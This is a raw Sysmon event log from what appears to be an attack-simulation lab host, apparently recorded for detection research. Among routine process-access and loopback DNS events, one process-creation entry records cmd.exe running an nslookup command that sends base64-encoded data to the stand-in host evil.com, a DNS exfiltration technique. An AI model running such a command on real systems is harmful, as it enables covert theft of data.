14:16:25.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000198595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.349{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsnup.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.302{2E1864BB-17B9-629A-B23F-000000005F02}17163832C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-B33F-000000005F02}7144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.296{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.296{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.281{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-B33F-000000005F02}7144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.281{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.281{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.281{2E1864BB-17B9-629A-B13F-000000005F02}75362388C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-B33F-000000005F02}7144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.295{2E1864BB-17B9-629A-B33F-000000005F02}7144C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B9-629A-B13F-000000005F02}7536C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsnup.tmp 2>&1 354300x8000000000000000198586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.779{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52540- 354300x8000000000000000198585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.779{00000000-0000-0000-0000-000000000000}3976<unknown process>-udptruefalse127.0.0.1-52540-false127.0.0.1-53domain 354300x8000000000000000198584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.779{00000000-0000-0000-0000-000000000000}3976<unknown process>-udpfalsefalse127.0.0.1-52539-false127.0.0.1-53domain 354300x8000000000000000198583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.779{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52539- 354300x8000000000000000198582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.779{00000000-0000-0000-0000-000000000000}3976<unknown process>-udptruefalse127.0.0.1-52539-false127.0.0.1-53domain 354300x8000000000000000198581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.697{00000000-0000-0000-0000-000000000000}1908<unknown process>-udpfalsefalse127.0.0.1-52538-false127.0.0.1-53domain 354300x8000000000000000198580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.697{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52538- 354300x8000000000000000198579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.607{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52537- 354300x8000000000000000198578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.607{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52536- 354300x8000000000000000198577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.607{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52535- 354300x8000000000000000198576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.545{00000000-0000-0000-0000-000000000000}336<unknown process>-udpfalsefalse127.0.0.1-52534-false127.0.0.1-53domain 354300x8000000000000000198575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.545{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52534- 354300x8000000000000000198574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.545{00000000-0000-0000-0000-000000000000}336<unknown process>-udptruefalse127.0.0.1-52534-false127.0.0.1-53domain 354300x8000000000000000198573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.545{00000000-0000-0000-0000-000000000000}336<unknown process>-udpfalsefalse127.0.0.1-52533-false127.0.0.1-53domain 354300x8000000000000000198572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.545{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52533- 354300x8000000000000000198571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.545{00000000-0000-0000-0000-000000000000}336<unknown process>-udptruefalse127.0.0.1-52533-false127.0.0.1-53domain 354300x8000000000000000198570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.545{00000000-0000-0000-0000-000000000000}336<unknown process>-udpfalsefalse127.0.0.1-52532-false127.0.0.1-53domain 354300x8000000000000000198569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.545{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52532- 354300x8000000000000000198568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.478{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52531- 354300x8000000000000000198567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.478{00000000-0000-0000-0000-000000000000}7584<unknown process>-udptruefalse127.0.0.1-52531-false127.0.0.1-53domain 354300x8000000000000000198566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.478{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52530- 354300x8000000000000000198565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.478{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52529- 354300x8000000000000000198564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.393{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52528- 354300x8000000000000000198563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.393{00000000-0000-0000-0000-000000000000}6560<unknown process>-udpfalsefalse127.0.0.1-52527-false127.0.0.1-53domain 354300x8000000000000000198562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.393{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52527- 354300x8000000000000000198561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.044{00000000-0000-0000-0000-000000000000}6932<unknown process>-udpfalsefalse127.0.0.1-52518-false127.0.0.1-53domain 354300x8000000000000000198560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.044{00000000-0000-0000-0000-000000000000}6932<unknown process>-udptruefalse127.0.0.1-52518-false127.0.0.1-53domain 354300x8000000000000000198559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.044{00000000-0000-0000-0000-000000000000}6932<unknown process>-udpfalsefalse127.0.0.1-52517-false127.0.0.1-53domain 354300x8000000000000000198558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.044{00000000-0000-0000-0000-000000000000}6932<unknown process>-udptruefalse127.0.0.1-52517-false127.0.0.1-53domain 354300x8000000000000000198557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.044{00000000-0000-0000-0000-000000000000}6932<unknown process>-udpfalsefalse127.0.0.1-52516-false127.0.0.1-53domain 354300x8000000000000000198556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.043{00000000-0000-0000-0000-000000000000}6932<unknown process>-udptruefalse127.0.0.1-52516-false127.0.0.1-53domain 354300x8000000000000000198555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.947{00000000-0000-0000-0000-000000000000}420<unknown process>-udpfalsefalse127.0.0.1-52515-false127.0.0.1-53domain 354300x8000000000000000198554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.946{00000000-0000-0000-0000-000000000000}420<unknown process>-udptruefalse127.0.0.1-52515-false127.0.0.1-53domain 354300x8000000000000000198553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.946{00000000-0000-0000-0000-000000000000}420<unknown process>-udpfalsefalse127.0.0.1-52514-false127.0.0.1-53domain 354300x8000000000000000198552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.946{00000000-0000-0000-0000-000000000000}420<unknown process>-udptruefalse127.0.0.1-52514-false127.0.0.1-53domain 354300x8000000000000000198551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.946{00000000-0000-0000-0000-000000000000}420<unknown process>-udpfalsefalse127.0.0.1-52513-false127.0.0.1-53domain 354300x8000000000000000198550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.946{00000000-0000-0000-0000-000000000000}420<unknown process>-udptruefalse127.0.0.1-52513-false127.0.0.1-53domain 10341000x8000000000000000198549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.265{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-B23F-000000005F02}1716C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.265{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-B23F-000000005F02}1716C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.265{2E1864BB-17B9-629A-B23F-000000005F02}17163832C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-B13F-000000005F02}7536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 